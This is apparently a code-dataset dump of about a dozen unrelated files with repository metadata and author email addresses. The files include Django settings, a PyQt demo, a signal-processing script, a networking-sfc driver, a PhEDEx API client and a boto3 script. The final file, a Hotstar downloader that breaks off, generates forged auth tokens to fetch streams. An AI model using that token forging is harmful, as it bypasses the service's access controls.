TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
SOCIAL_AUTH_POSTGRES_JSONFIELD = True
SOCIAL_AUTH_GITHUB_KEY = os.getenv('SOCIAL_AUTH_GITHUB_KEY')
SOCIAL_AUTH_GITHUB_SECRET = os.getenv('SOCIAL_AUTH_GITHUB_SECRET')
| [
"alexgott1990@gmail.com"
] | alexgott1990@gmail.com |
cb16b3fbbd81a6f0cb29a42504cccd16bf61955e | e10422c540b3199cc5663c1c226ae2b8f24fd5cf | /Results/__init__.py | 36b8f9b1f825122a4c1052ad476813c4f6cc63ab | [] | no_license | cccccsf/single_point | f014a9f0a18eb30ddd4a967a822eba3bd26ed53a | 61cc11b0c40e082b45c5458c8435dbea001af466 | refs/heads/master | 2020-05-09T10:10:05.035435 | 2019-05-07T12:44:30 | 2019-05-07T12:44:30 | 181,030,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/usr/bin/python3
from Results.results import results
from Results.calculation import get_extrapolated_correction
from Results.class_result import Result
| [
"cccccsf@hotmail.com"
] | cccccsf@hotmail.com |
9e5456d6b76c0bd071eb86f99e5e3f7dd0882a2e | fb79dc795666de2f5ae28c9393403d8972bf181d | /santdex/Basic_button.py | 92e6f7bcf45728ba0220459b70be783a454b82e4 | [] | no_license | paulossant/QtPy | 2a99141a173d845b4a110af159f2284472873c68 | dfebbc8e389725a1d9a9fe0896450db4e4612756 | refs/heads/master | 2022-02-16T17:10:56.818156 | 2019-09-01T09:45:13 | 2019-09-01T09:45:13 | 198,267,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 27 14:46:01 2019
@author: pssantos
"""
import sys
from PyQt5 import QtWidgets, QtGui, QtCore
class Window(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(50, 50, 800, 600)
self.setWindowTitle('BasicGui!')
self.setWindowIcon(QtGui.QIcon('trilobit.jpg'))
self.setWindowIconText('Trilobit')
self.home()
def home(self):
btn = QtWidgets.QPushButton('Quit', self)
# btn.clicked.connect(QtCore.QCoreApplication.exit)
btn.clicked.connect(self.close_application)
# btn.resize(100,100)
btn.move(100,100)
def close_application(self):
# print(' whooaaaa so custom!')
sys.exit()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
# app.aboutToQuit.connect(app.deleteLater)
GUI = Window()
GUI.show()
app.exec_()
sys.exit(0) | [
"noreply@github.com"
] | paulossant.noreply@github.com |
1fea2857dcc9af90fdf162402607c141fca68c60 | bd97707bef0e13e40916c623503bcdabe677a55b | /view/o_token.py | 03ecae9fcc9dee9b608821ae0b7d2befe7e85e9f | [] | no_license | IvyBrandyn/tic-tac-toe | eaf1c547b739edc2fa9a44132555e1f87abb86cb | 4f7182e5981d63288a7809ec8817097c16dd8a38 | refs/heads/master | 2023-05-14T16:10:43.752468 | 2021-06-01T20:08:53 | 2021-06-01T20:08:53 | 324,673,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from view.token_piece import TokenPiece
class OToken(TokenPiece):
def draw_token(self, line: int) -> str:
if line == 0:
return r" //==\\ "
elif line == 1:
return " || || "
elif line == 2:
return r" \\==// "
def __str__(self):
return "O"
def is_token(self, response: str):
return response in ["o", "O", "0"]
| [
"brandynsandoval@gmail.com"
] | brandynsandoval@gmail.com |
75d4ea1cf87452918b95075d0138a33e121d8174 | 60c24a2191923393a7c3916d46fb537d39de3952 | /main.py | ea18b38df1429d2e925c2e8a5542d862780cad98 | [] | no_license | mylo19/Advanced_Signal_Processing | a752f020678b8618038c19a25067832f0e8f46fb | 930f633c7774d1146c46cbfef766dfc825782369 | refs/heads/main | 2023-04-04T06:50:49.696387 | 2021-04-13T17:33:17 | 2021-04-13T17:33:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from Indirect_Method_Functions import *
import math
lamda1 = 0.12
lamda2 = 0.3
lamda3 = lamda1 + lamda2
lamda4 = 0.19
lamda5 = 0.17
lamda6 = lamda4 + lamda5
lamda = np.array([lamda1, lamda2, lamda3, lamda4, lamda5, lamda6])
N: int = 8192
K = 32
M = 256
L = 64
X = [0]*N
for k in range(N):
phi = np.random.uniform(0, 2*math.pi, 6)
phi[2] = phi[0] + phi[1]
phi[5] = phi[3] + phi[4]
x = [0]*len(phi)
for i in range(len(phi)):
x[i] = math.cos(2*math.pi*lamda[i] + phi[i])
X[k] = sum(x)
Y = split_sample(N, M, X)
c = np.zeros(shape=(L, L))
for k in range(0, N, M):
r = r_calculation(Y[k:k+M], L, M)
c += r
c = c/K
C_indirect = indirect_bispectrum_calculation(c, L, 0)
| [
"mylowade98@gmail.com"
] | mylowade98@gmail.com |
937713858c166adde7bccaca7cff6d4be55d0b99 | f6c7084f91434566a9aa1b821d2739edede036f8 | /ReadFileLineByLine/venv/Scripts/pip-script.py | adf8211b1eadc9e26f6daea7d86b6b5d26d11112 | [] | no_license | GANESH0080/Python-WorkPlace | 87fc3776e693d254661c476bfe977c696d087276 | 43196086bee26cbeae25fb7bbacb8dbbde85d648 | refs/heads/master | 2020-09-20T03:45:13.824696 | 2019-11-27T07:27:17 | 2019-11-27T07:27:17 | 224,369,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | #!D:\PythonWorkPlace\ReadFileLineByLine\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"ganusalunkhe@gmail.com"
] | ganusalunkhe@gmail.com |
f8f4cf02fcea381bb1fa2612b29951a3d0b866ec | 2e5304a5801c81241dfe2998d5a182e1c0cdcab3 | /scramble.py | 798a775504441a2b8ca052145242eec1ea1d1a10 | [] | no_license | jamcowl/TextScramblers | eead7410d8d0734750dd5c92a3984b6afb98421e | d6a20aa2bad37418f953da8efa2d02e1e9c2d7b4 | refs/heads/master | 2021-01-20T06:33:01.380472 | 2017-10-28T00:08:39 | 2017-10-28T00:08:39 | 101,504,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | #!/usr/bin/env python
from random import shuffle
import sys
# function to scramble a word
def scramble(inString):
result = inString[0]
innards = list(inString[1:-1])
if len(inString) == 1:
return inString
# construct output
while(True):
shuffle(innards)
result = inString[0]
for innard in innards:
result += innard
result += inString[-1]
# if output happens to match input, try it again
if (len(inString) < 4 or result != inString):
break
else:
result = inString[0]
return result
# do the things
inputStrings = sys.argv[1:]
out = ""
for inputString in inputStrings:
scram = scramble(inputString)
out += scram+" "
out = out.strip();
print "Scrambled version:"
print out
| [
"james_cowley@live.co.uk"
] | james_cowley@live.co.uk |
b901c321019e6ddbc08ebea4429f826b3269e9ab | 0669ea772b4a813c147b4884df609ab6c0fc8f44 | /gpsnprototypewebsite/about/urls.py | 9d697deac94a224e457b022510617cdfaf3dc56a | [] | no_license | PurdueCAM2Project/CAM2Phenology | dc01167aa61785cfa7fc3827016b69e2846d0d6b | b10e9f10ce21effcf0ca6cad05c90f3b67a83b98 | refs/heads/master | 2021-09-13T01:59:52.323084 | 2018-04-23T18:10:05 | 2018-04-23T18:10:05 | 103,655,290 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | from django.conf.urls import url #imports necessary stuff to handle URL confs and such
from . import views #get the views from the folder that you're in
urlpatterns = [
url(r'^$', views.about, name = 'about'),
url(r'^contact/$', views.contact, name = 'contact'), # needs to be synced with Support Contact
url(r'^mission/$', views.mission, name = 'mission'),
url(r'^abilities/$', views.abilities, name = 'abilities'),
url(r'^instructions/$', views.instructions, name = 'instructions'),
url(r'^instructions/tutorial/$', views.tutorial, name = 'tutorial'),
] | [
"berry65@purdue.edu"
] | berry65@purdue.edu |
e40affec22a2a7089ad6a4f67068270232f077c7 | ba315c4a0512f84f77f2c785dbe54160b006919c | /dragonflow/neutron/services/sfc/driver.py | 5409c3cd83bb3e87b27a37cd35e89429e3dffc9e | [
"Apache-2.0"
] | permissive | Benny93/dragonflow | f1a1808cc065d504293d350023b80a481d9c81de | fbb15e221f8ce2bf6a4bb6d66635dde9ebb13131 | refs/heads/master | 2021-01-22T04:04:53.612529 | 2017-10-20T12:27:34 | 2017-10-20T12:27:34 | 102,262,082 | 1 | 0 | null | 2017-09-03T12:13:06 | 2017-09-03T12:13:06 | null | UTF-8 | Python | false | false | 5,491 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from networking_sfc.services.sfc.drivers import base
from dragonflow.db.models import sfc
from dragonflow.neutron.services import mixins
def _get_optional_params(obj, *params):
'''This function returns a dictionary with all the parameters from `params`
that were present in `obj`, for example:
>>> _get_optional_params({'a': 1, 'b': 2}, 'a', 'c')
{'a': 1}
'''
res = {}
for param in params:
if param in obj:
res[param] = obj.get(param)
return res
class DfSfcDriver(base.SfcDriverBase, mixins.LazyNbApiMixin):
# The new SFC driver API:
def initialize(self):
pass
def create_port_chain_postcommit(self, context):
port_chain = context.current
pc_params = port_chain.get('chain_parameters')
self.nb_api.create(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
name=port_chain.get('name'),
port_pair_groups=port_chain.get('port_pair_groups', []),
flow_classifiers=port_chain.get('flow_classifiers', []),
protocol=pc_params.get('correlation'),
chain_id=port_chain.get('chain_id'),
),
)
def update_port_chain_postcommit(self, context):
port_chain = context.current
extra_args = _get_optional_params(
port_chain,
'port_pair_groups',
'flow_classifiers',
)
self.nb_api.update(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
name=port_chain.get('name'),
**extra_args
),
)
def delete_port_chain_postcommit(self, context):
port_chain = context.current
self.nb_api.delete(
sfc.PortChain(
id=port_chain['id'],
topic=port_chain['project_id'],
),
)
def create_port_pair_group_postcommit(self, context):
port_pair_group = context.current
self.nb_api.create(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
name=port_pair_group.get('name'),
port_pairs=port_pair_group.get('port_pairs', []),
# FIXME (dimak) add support for lb_fields, service_type
),
)
def update_port_pair_group_postcommit(self, context):
port_pair_group = context.current
extra_args = _get_optional_params(port_pair_group, 'port_pairs')
self.nb_api.update(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
name=port_pair_group.get('name'),
**extra_args
),
)
def delete_port_pair_group_postcommit(self, context):
port_pair_group = context.current
self.nb_api.delete(
sfc.PortPairGroup(
id=port_pair_group['id'],
topic=port_pair_group['project_id'],
),
)
def create_port_pair_postcommit(self, context):
port_pair = context.current
sf_params = port_pair.get('service_function_parameters', {})
self.nb_api.create(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
name=port_pair.get('name'),
ingress_port=port_pair['ingress'],
egress_port=port_pair['egress'],
correlation_mechanism=(
sf_params.get('correlation') or sfc.CORR_NONE
),
weight=sf_params.get('weight')
),
)
def update_port_pair_postcommit(self, context):
port_pair = context.current
self.nb_api.update(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
name=port_pair.get('name'),
),
)
def delete_port_pair_postcommit(self, context):
port_pair = context.current
self.nb_api.delete(
sfc.PortPair(
id=port_pair['id'],
topic=port_pair['project_id'],
),
)
# Legacy SFC driver API, has to be stubbed due to ABC
def create_port_chain(self, context):
pass
def update_port_chain(self, context):
pass
def delete_port_chain(self, context):
pass
def create_port_pair_group(self, context):
pass
def update_port_pair_group(self, context):
pass
def delete_port_pair_group(self, context):
pass
def create_port_pair(self, context):
pass
def update_port_pair(self, context):
pass
def delete_port_pair(self, context):
pass
| [
"dima.kuznetsov@toganetworks.com"
] | dima.kuznetsov@toganetworks.com |
9f30f719cd8bd8fc273306508cc8ca3498564099 | 90a2b8961ac18e2130887e4c1fbe875dea490fdd | /03-Methods and Functions/spy_game.py | 321642e9c61e4161e6643d8bcb79e9d51a5b0e9c | [] | no_license | paperbag-zz/python-exercises | 3adb13128b9b5abf55cec4e9e0d349f5b7832bfb | e59c487497fb42dd4dae4c9f823969aaec819d1c | refs/heads/master | 2020-04-01T18:49:24.322885 | 2018-10-24T05:05:50 | 2018-10-24T05:05:50 | 153,516,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | def spy_game(numbers):
spy_caught = ['', '', '']
for number in numbers:
if spy_caught == ['', '', ''] and number == 0:
spy_caught = ['0', '', '']
if spy_caught == ['0', '', ''] and number == 0:
spy_caught = ['0', '0', '']
if spy_caught == ['0', '0', ''] and number == 7:
spy_caught = ['0', '0', '7']
if spy_caught == ['0', '0', '7']:
return True
return False
spy_game([])
if spy_game([1,4,7,8,3,4,0,2,8,9,0,3,4,1,3,7,9]):
print('Spy Game 1', True)
else:
print('Spy Game 1', False)
if spy_game([1,4, 0,0,7,8,3,4,2,3,4,8,9,1,3,7,9]):
print('Spy Game 2', True)
else:
print('Spy Game 2', False)
if spy_game([1,4,7,8,3,4,2,8,9,3,4,1,3,7,9]):
print('Spy Game 3', True)
else:
print('Spy Game 3', False)
if spy_game([8,9,3,4,1,3,7,9,1,4,7,8,3,4,2]):
print('Spy Game 4', True)
else:
print('Spy Game 4', False)
if spy_game([1,4,7,8,3,4,2,8,9,3,4,1,3,7,9]):
print('Spy Game 5', True)
else:
print('Spy Game 5', False)
| [
"paperbag.a@gmail.com"
] | paperbag.a@gmail.com |
0d8a2556c00cf0f1fd3764e071685a6426465736 | e32154b11d9307855bfa3a28fd5ef909e6ea7fca | /Api/src/phedexApi.py | 75550461844d760101a94239343901f257f1348e | [
"MIT"
] | permissive | cpausmit/IntelROCCS | c5947cb038e338f7bcdf8f3d4d203b45ae0df670 | 526672963452ed33706468ea2dc6fb63510d9090 | refs/heads/master | 2020-04-15T17:28:04.978006 | 2017-03-24T12:17:01 | 2017-03-24T12:17:01 | 17,555,528 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 14,841 | py | #!/usr/local/bin/python
#---------------------------------------------------------------------------------------------------
# Python interface to access PhEDEx online API. See website for API documentation
# (https://cmsweb.cern.ch/phedex/datasvc/doc)
#
# Use grid-proxy-init to aquire a valid CERN proxy, proxy's are only valid for a limited time.
# grid-proxy-init requires usercert.pem and userkey.pem in ~/.globus/
# It is up to the caller to make sure a valid CERN proxy is available.
# Example: grid-proxy-init -valid 24:00 (Generates a proxy valid for 24h)
#
# The API doesn't check to make sure correct values are passed or that rquired parameters are
# passed. All such checks needs to be done by the caller.
#
# Functions only return data in form of JSON, never XML.
# Instance of phedex can be selected using the instance parameter [prod/dev], default is prod.
#
# In case of error an error message is printed to the log.
# If a valid call is made but no data was found a JSON structure is still returned, it is up to
# the caller to check for actual data.
#---------------------------------------------------------------------------------------------------
import os, urllib, urllib2, httplib, json, ConfigParser
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
from email.Utils import formataddr
from subprocess import Popen, PIPE
class phedexApi:
def __init__(self):
config = ConfigParser.RawConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'api.cfg'))
self.fromEmail = config.items('from_email')[0]
self.toEmails = config.items('error_emails')
self.phedexBase = config.get('phedex', 'base')
#===================================================================================================
# H E L P E R S
#===================================================================================================
def call(self, url, values):
data = urllib.urlencode(values)
opener = urllib2.build_opener(HTTPSGridAuthHandler())
request = urllib2.Request(url, data)
strout = ""
e = ""
msg = ""
# Will try to call 3 times before reporting an error
for attempt in range(3):
try:
strout = opener.open(request)
response = strout.read()
jsonData = json.loads(response)
except urllib2.HTTPError, err:
e = err
msg = e.read()
continue
except urllib2.URLError, err:
e = err
msg = e.read()
continue
except ValueError, err:
e = err
continue
else:
break
else:
self.error(e, msg)
return jsonData
def error(self, e, errMsg):
title = "FATAL IntelROCCS Error -- PhEDEx"
text = "FATAL -- %s --- MSG: %s" % (str(e), str(errMsg))
msg = MIMEMultipart()
msg['Subject'] = title
msg['From'] = formataddr(self.fromEmail)
msg['To'] = self._toStr(self.toEmails)
msg1 = MIMEMultipart("alternative")
msgText1 = MIMEText("<pre>%s</pre>" % text, "html")
msgText2 = MIMEText(text)
msg1.attach(msgText2)
msg1.attach(msgText1)
msg.attach(msg1)
msg = msg.as_string()
p = Popen(["/usr/sbin/sendmail", "-toi"], stdin=PIPE)
p.communicate(msg)
print "FATAL -- %s --- MSG: %s" % (str(e), str(errMsg))
raise Exception("FATAL -- %s --- MSG: %s" % (str(e), str(errMsg)))
def _toStr(self, toList):
names = [formataddr(i) for i in zip(*toList)]
return ', '.join(names)
def createXml(self, datasets=[], instance='prod'):
xml = '<data version="2.0">'
xml = xml + '<dbs name="https://cmsweb.cern.ch/dbs/%s/global/DBSReader">' % (instance)
successDatasets = []
for dataset in datasets:
for attempt in range(3):
jsonData = self.data(dataset=dataset, level='block')
if not jsonData:
continue
try:
data = jsonData.get('phedex').get('dbs')[0].get('dataset')[0]
except IndexError:
continue
else:
break
else:
print("ERROR -- Couldn't create xml data for dataset %s\n" % (dataset))
continue
successDatasets.append(dataset)
xml = xml + '<dataset name="%s" is-open="%s">' % (data.get('name'), data.get('is_open'))
xml = xml + "</dataset>"
xml = xml + "</dbs>"
xmlData = xml + "</data>"
return successDatasets, xmlData
#===================================================================================================
# A P I C A L L S
#===================================================================================================
def blockArrive(self, id_='', block='', dataset='', to_node='', priority='', update_since='', basis='', arrive_before='', arrive_after='', instance='prod'):
values = {'id':id_, 'block':block, 'dataset':dataset, 'to_node':to_node, 'priority':priority, 'update_since':update_since, 'basis':basis, 'arrive_before':arrive_before, 'arrive_after':arrive_after}
url = "%s/json/%s/blockarrive" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- blockArrive call failed", "values: id=%s, block=%s, dataset=%s, to_node=%s, priority=%s, update_since=%s, basis=%s, arrive_before=%s, arrive_after=%s, instance=%s\n" % (id_, block, dataset, to_node, priority, update_since, basis, arrive_before, arrive_after, instance))
return jsonData
def blockReplicas(self, block='', dataset='', node='', se='', update_since='', create_since='', complete='', dist_complete='', subscribed='', custodial='', group='', show_dataset='', instance='prod'):
values = {'block':block, 'dataset':dataset, 'node':node, 'se':se, 'update_since':update_since, 'create_since':create_since, 'complete':complete, 'dist_complete':dist_complete, 'subscribed':subscribed, 'custodial':custodial, 'group':group, 'show_dataset':show_dataset}
url = "%s/json/%s/blockreplicas" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- blockReplicas call failed", "values: block=%s, dataset=%s, node=%s, se=%s, update_since=%s, create_since=%s, complete=%s, dist_complete=%s, subscribed=%s, custodial=%s, group=%s, show_dataset=%s, instance=%s\n" % (block, dataset, node, se, update_since, create_since, complete, dist_complete, subscribed, custodial, group, show_dataset, instance))
return jsonData
def data(self, dataset='', block='', file_='', level='', create_since='', instance='prod'):
values = {'dataset':dataset, 'block':block, 'file':file_, 'level':level, 'create_since':create_since}
url = "%s/json/%s/data" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- data call failed", "values: dataset=%s, block=%s, file=%s, level=%s, create_since=%s, instance=%s\n" % (dataset, block, file_, level, create_since, instance))
return jsonData
def delete(self, node='', data='', level='', rm_subscriptions='', comments='', instance='prod'):
values = {'node':node, 'data':data, 'level':level, 'rm_subscriptions':rm_subscriptions, 'comments':comments}
url = "%s/json/%s/delete" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- delete call failed", "values: node=%s, level=%s, rm_subscriptions=%s, comments=%s, instance=%s\n" % (node, level, rm_subscriptions, comments, instance))
return jsonData
def deleteRequests(self, request='', node='', create_since='', limit='', approval='', requested_by='', instance='prod'):
values = {'request':request, 'node':node, 'create_since':create_since, 'limit':limit, 'approval':approval, 'requested_by':requested_by}
url = "%s/json/%s/deleterequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- deleteRequests call failed", "values: request=%s, node=%s, create_since=%s, limit=%s, approval=%s, requested_by=%s, instance=%s\n" % (request, node, create_since, limit, approval, requested_by, instance))
return jsonData
def deletions(self, node='', se='', block='', dataset='', id_='', request='', request_since='', complete='', complete_since='', instance='prod'):
values = {'node':node, 'se':se, 'block':block, 'dataset':dataset, 'id':id_, 'request':request, 'request_since':request_since, 'complete':complete, 'complete_since':complete_since}
url = "%s/json/%s/deletions" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- deletions call failed for values: node=%s, se=%s, block=%s, dataset=%s, id=%s, request=%s, request_since=%s, complete=%s, complete_since=%s, instance=%s\n" % (node, se, block, dataset, id_, request, request_since, complete, complete_since, instance))
return jsonData
def requestList(self, request='', type_='', approval='', requested_by='', node='', decision='', group='', create_since='', create_until='', decide_since='', decide_until='', dataset='', block='', decided_by='', instance='prod'):
values = {'request':request, 'type':type_, 'approval':approval, 'requested_by':requested_by, 'node':node, 'decision':decision, 'group':group, 'create_since':create_since, 'create_until':create_until, 'decide_since':decide_since, 'decide_until':decide_until, 'dataset':dataset, 'block':block, 'decided_by':decided_by}
url = "%s/json/%s/requestlist" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- requestList call failed", "values: request=%s, type=%s, approval=%s, requested_by=%s, node=%s, decision=%s, group=%s, create_since=%s, create_until=%s, decide_since=%s, decide_until=%s, dataset=%s, block=%s, decided_by=%s, instance=%s\n" % (request, type_, approval, requested_by, node, decision, group, create_since, create_until, decide_since, decide_until, dataset, block, decided_by, instance))
return jsonData
def subscribe(self, node='', data='', level='', priority='', move='', static='', custodial='', group='', time_start='', request_only='', no_mail='', comments='', instance='prod'):
values = {'node':node, 'data':data, 'level':level, 'priority':priority, 'move':move, 'static':static, 'custodial':custodial, 'group':group, 'time_start':time_start, 'request_only':request_only, 'no_mail':no_mail, 'comments':comments}
url = "%s/json/%s/subscribe" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- subscribe call failed", "values: node=%s, data=%s, level=%s, priority=%s, move=%s, static=%s, custodial=%s, group=%s, time_start=%s, request_only=%s, no_mail=%s, comments=%s, instance=%s\n" % (node, data, level, priority, move, static, custodial, group, time_start, request_only, no_mail, comments, instance))
return jsonData
def subscriptions(self, dataset='', block='', node='', se='', create_since='', request='', custodial='', group='', priority='', move='', suspended='', collapse='', percent_min='', percent_max='', instance='prod'):
values = {'dataset':dataset, 'block':block, 'node':node, 'se':se, 'create_since':create_since, 'request':request, 'custodial':custodial, 'group':group, 'priority':priority, 'move':move, 'suspended':suspended, 'collapse':collapse, 'percent_min':percent_min, 'percent_max':percent_max}
url = "%s/json/%s/subscriptions" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- subscriptions call failed", "values: dataset=%s, block=%s, node=%s, se=%s, create_since=%s, request=%s, custodial=%s, group=%s, priority=%s, move=%s, suspended=%s, collapse=%s, percent_min=%s, percent_max=%s, instance=%s\n" % (dataset, block, node, se, create_since, request, custodial, group, priority, move, suspended, collapse, percent_min, percent_max, instance))
return jsonData
def transferRequests(self, request='', node='', group='', create_since='', limit='', approval='', requested_by='', instance='prod'):
values = {'request':request, 'node':node, 'group':group, 'create_since':create_since, 'limit':limit, 'approval':approval, 'requested_by':requested_by}
url = "%s/json/%s/transferrequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- transferRequests call failed", "values: request=%s, node=%s, group=%s, create_since=%s, limit=%s, approval=%s, requested_by=%s, instance=%s\n" % (request, node, group, create_since, limit, approval, requested_by, instance))
return jsonData
def updateRequest(self, decision='', request='', node='', comments='', instance='prod'):
values = {'decision':decision, 'request':request, 'node':node, 'comments':comments}
url = "%s/json/%s/updaterequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- updateRequest call failed", "values: decision=%s, request=%s, node=%s, comments=%s, instance=%s\n" % (decision, request, node, comments, instance))
return jsonData
#===================================================================================================
# H E L P E R C L A S S
#===================================================================================================
class HTTPSGridAuthHandler(urllib2.HTTPSHandler):
def __init__(self):
urllib2.HTTPSHandler.__init__(self)
self.key = self.getProxy()
self.cert = self.key
def https_open(self, req):
return self.do_open(self.getConnection, req)
def getProxy(self):
proxy = os.environ.get('X509_USER_PROXY')
if not proxy:
proxy = "/tmp/x509up_u%d" % (os.geteuid(),)
return proxy
def getConnection(self, host, timeout=300):
return httplib.HTTPSConnection(host, key_file=self.key, cert_file=self.cert)
| [
"barrefors@gmail.com"
] | barrefors@gmail.com |
8df22946d8253c3054208e5f4da0156f41eb2a38 | 19e9e3d063dc93206b4cc60bda006bb0da97d37c | /cmi/nwd_dzielenie.py | 15b5bd712fd707f26941c47016d72c877c932476 | [] | no_license | jasonj2333/python8 | 9825e565a805cd8edf1446bd08a21b1c43eab6a2 | abe1f7b6641b08ce430c86874b182cf1911baf5d | refs/heads/master | 2022-01-30T09:26:27.805311 | 2022-01-25T20:53:40 | 2022-01-25T20:53:40 | 225,360,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | #zadanie 8 - parzyste
a = int(input("Podaj 1 liczbę: "))
b = int(input("Podaj 2 liczbę: "))
c=a
d=b
while(b != 0):
dzielnik = b
b = a%b
a = dzielnik
print("NWD dla liczb %d i %d wynosi %d"%(c, d, a))
| [
"jasonj2333@gmail.com"
] | jasonj2333@gmail.com |
dea277b6068f695ff986b4f15598ba361d0f8ffb | 668dc0eb4e76c3cb1e568c4568fec80e493c8379 | /imageClassifier/uploadImages/migrations/0002_auto_20180328_1839.py | 8c12973445ce6906c3039627f20d6f1da8653b65 | [] | no_license | 6Jonathan6/imageClassifier | e9680e4e8d7d8972bef9da4c558d36343ab2e648 | af870d6ad496274374d4a163e626c297391b68ec | refs/heads/master | 2020-03-08T13:06:33.012179 | 2018-04-05T02:42:51 | 2018-04-05T02:42:51 | 128,149,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Generated by Django 2.0.2 on 2018-03-28 18:39
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('uploadImages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='image',
name='labels',
field=django.contrib.postgres.fields.jsonb.JSONField(),
),
]
| [
"ec2-user@ip-172-31-56-157.ec2.internal"
] | ec2-user@ip-172-31-56-157.ec2.internal |
b3a25a16c44a7880c5d114a9d24cd90fce6c7cab | 229662997dbef8f1694cec4e365704f91435895a | /app.py | 9038671409e93fbb85c41c1aa47fbaccb8f8e5ec | [] | no_license | artwrk-samyak/dynamo | 4185c83bacef01dbef82d606f2c6c98d769d3b0b | fff802655e3c5867630e35b09426c5448835b557 | refs/heads/master | 2022-10-13T21:17:30.513614 | 2020-06-14T14:38:43 | 2020-06-14T14:38:43 | 272,220,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | import boto3
def get_details(table):
    """Print the DynamoDB DescribeTable response for *table*."""
    client = boto3.client('dynamodb') #connection
    response = str(client.describe_table(TableName=table))
    print(response)
def put_value(table):
    """Insert a fixed sample item into *table* and print the PutItem response."""
    dynamodb = boto3.resource('dynamodb') #connection
    response = dynamodb.Table(table).put_item(
        Item={
            'Artist_Id': 25,
            'ArtwrkTitle': "Painting",
        }
    )
    print(response)
# Running the module describes the table; the write call is left disabled.
get_details("Test_Profile")
#put_value("Test_Profile")
| [
"noreply@github.com"
] | artwrk-samyak.noreply@github.com |
10cb9577b9bb3df887a10d040a16bb298fd3def5 | 5918f9231b8e7403907b19f863bb4fa59f468cf6 | /hotstar_dl.py | ecd153b252cf3484fabf0aab6697f4a3277455f2 | [] | no_license | venkatasudheers1234/hotstar-dl | f1918f203f954ed84c3147a96c10d5bb3a5f3200 | f83e5060d3e53e3769257d68eafa11d0cb043636 | refs/heads/main | 2023-04-08T02:22:44.783651 | 2021-04-23T13:02:01 | 2021-04-23T13:02:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | import requests
import uuid
import os
import re
import pyfiglet
from utils.helper import generate_hmac_id, generate_user_token, ffmpeg_download
def video_extractor(url):
    """Fetch Hotstar playback metadata for the content id embedded in *url*.

    Returns the decoded JSON payload on success; prints a message and
    returns ``None`` when playback URLs are unavailable (e.g. DRM-protected
    or premium-only content).
    """
    # The content id is the 7th path component of the Hotstar URL.
    id = url.split("/")[6]
    auth = generate_hmac_id()
    user_token = generate_user_token()
    response = requests.get(
        "https://api.hotstar.com/play/v2/playback/content/" + id,
        headers={
            "hotstarauth": auth,
            "x-hs-appversion": "7.15.1",
            "x-hs-platform": "web",
            "x-hs-usertoken": user_token,
            "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36",
        },
        params={
